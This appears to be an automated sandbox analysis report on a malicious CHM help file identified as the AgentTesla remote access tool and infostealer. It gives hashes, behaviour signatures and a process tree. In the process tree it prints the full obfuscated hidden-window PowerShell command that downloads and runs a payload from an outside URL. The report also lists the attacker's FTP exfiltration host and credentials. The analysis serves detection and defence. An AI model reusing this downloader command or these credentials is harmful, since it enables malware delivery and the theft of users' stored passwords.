Analysis

  • max time kernel
    51s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 01:54

General

  • Target

    4e5ef8e38b17fdf30961f28d4b5e2e23.chm

  • Size

    14KB

  • MD5

    4e5ef8e38b17fdf30961f28d4b5e2e23

  • SHA1

    a7da3f869505242eb93c6bb07bc7cc76b6a5d71b

  • SHA256

    f0c20d4ea2e2cc1d3c9df58b1a4854f9e3b761b7cd0c26860559289c74a8d50f

  • SHA512

    c33cfc30c355dcb2638a7835986572c3da27b12cbb6c4a3773fbd1ce03e2c5b1710e15f1a15253f2951455eae53e71b5837dcc4176ace40bf43326b72e846f7c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://pacurariu.com/F37.jpg

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.jordi-spedition.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    asdqwe123!@#

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.jordi-spedition.com/
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    asdqwe123!@#

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • suricata: ET MALWARE AgentTesla Exfil via FTP

    suricata: ET MALWARE AgentTesla Exfil via FTP

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\4e5ef8e38b17fdf30961f28d4b5e2e23.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'http' + '://pacurariu.com/F37.jpg')|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1200

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\3f8b3fda-7c61-4ab4-930f-214c6ca10432\AgileDotNetRT64.dll

    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

  • \Users\Admin\AppData\Local\Temp\ac0a83c9-940b-4ffc-8fb9-5eb938a1d618\AgileDotNetRT64.dll

    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

  • memory/1160-54-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

    Filesize

    8KB

  • memory/1200-68-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-74-0x0000000075581000-0x0000000075583000-memory.dmp

    Filesize

    8KB

  • memory/1200-73-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-71-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-63-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-66-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-64-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1200-67-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/2024-59-0x000000000269B000-0x00000000026BA000-memory.dmp

    Filesize

    124KB

  • memory/2024-57-0x000007FEEDED0000-0x000007FEEEA2D000-memory.dmp

    Filesize

    11.4MB

  • memory/2024-61-0x000007FEEFFA0000-0x000007FEF0124000-memory.dmp

    Filesize

    1.5MB

  • memory/2024-58-0x0000000002694000-0x0000000002697000-memory.dmp

    Filesize

    12KB